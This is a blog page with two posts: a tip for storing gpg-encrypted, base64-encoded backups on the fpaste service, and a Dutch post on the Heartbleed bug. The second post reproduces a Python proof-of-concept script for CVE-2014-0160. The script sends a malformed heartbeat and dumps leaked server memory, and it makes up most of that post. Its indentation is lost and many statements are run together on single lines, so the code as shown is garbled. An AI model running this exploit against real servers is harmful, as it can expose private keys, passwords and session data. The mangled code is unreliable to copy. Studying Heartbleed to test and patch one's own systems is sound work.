Free backup space ?

Playing around today with fpaste (fedora paste) I thought about free backup space….
What if you can backup your system, encrypt the data and put it up on fpaste ?

A simple test…

dmesg | gpg -e --recipient my@ema.il | base64 | fpaste --title "part001"

Will give you back a URL where your encrypted and base64 encoded data is….

To get it back :

curl <URL>/raw | base64 -d | gpg -d

It will only stay on fpaste for 604800 seconds (7 days) but at least you will have a backup for 7 days 🙂

Maybe we can script around this and refresh every backup after 6.9 days ?

Of course you need to keep track of which URLs contain you backups, but you can put that in fpaste too… so you only need 1 URL to get your backups back…..

So gpg, base64, split, rar and other tools are your friends….

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Heartbleed bug

Gisteren is de Heartbleed bug gevonden in openssl : http://heartbleed.com.

Hieronder een python scriptje wat je kunt gebruiken om het eea te testen :


#!/usr/bin/python

# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)
# The author disclaims copyright to this source code.

import sys
import struct
import socket
import time
import select
import re
from optparse import OptionParser

options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')
options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')

def h2bin(x):
return x.replace(' ', '').replace('\n', '').decode('hex')

hello = h2bin('''
16 03 02 00 dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00
00 0f 00 01 01
''')

hb = h2bin('''
18 03 02 00 03
01 40 00
''')

def hexdump(s):
for b in xrange(0, len(s), 16):
lin = [c for c in s[b : b + 16]]
hxdat = ' '.join('%02X' % ord(c) for c in lin)
pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin) print ' %04x: %-48s %s' % (b, hxdat, pdat) print def recvall(s, length, timeout=5): endtime = time.time() + timeout rdata = '' remain = length while remain > 0:
rtime = endtime - time.time()
if rtime < 0: return None r, w, e = select.select([s], [], [], 5) if s in r: data = s.recv(remain) # EOF? if not data: return None rdata += data remain -= len(data) return rdata def recvmsg(s): hdr = recvall(s, 5) if hdr is None: print 'Unexpected EOF receiving record header - server closed connection' return None, None, None typ, ver, ln = struct.unpack('>BHH', hdr)
pay = recvall(s, ln, 10)
if pay is None:
print 'Unexpected EOF receiving record payload - server closed connection'
return None, None, None
print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))
return typ, ver, pay

def hit_hb(s):
s.send(hb)
while True:
typ, ver, pay = recvmsg(s)
if typ is None:
print 'No heartbeat response received, server likely not vulnerable'
return False

if typ == 24:
print 'Received heartbeat response:'
hexdump(pay)
if len(pay) > 3:
print 'WARNING: server returned more data than it should - server is vulnerable!'
else:
print 'Server processed malformed heartbeat, but did not return any extra data.'
return True

if typ == 21:
print 'Received alert:'
hexdump(pay)
print 'Server returned error, likely not vulnerable'
return False

def main():
opts, args = options.parse_args()
if len(args) < 1: options.print_help() return s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) print 'Connecting...' sys.stdout.flush() s.connect((args[0], opts.port)) print 'Sending Client Hello...' sys.stdout.flush() s.send(hello) print 'Waiting for Server Hello...' sys.stdout.flush() while True: typ, ver, pay = recvmsg(s) if typ == None: print 'Server closed connection without sending Server Hello.' return # Look for server hello done message. if typ == 22 and ord(pay[0]) == 0x0E: break print 'Sending heartbeat request...' sys.stdout.flush() s.send(hb) hit_hb(s) if __name__ == '__main__': main()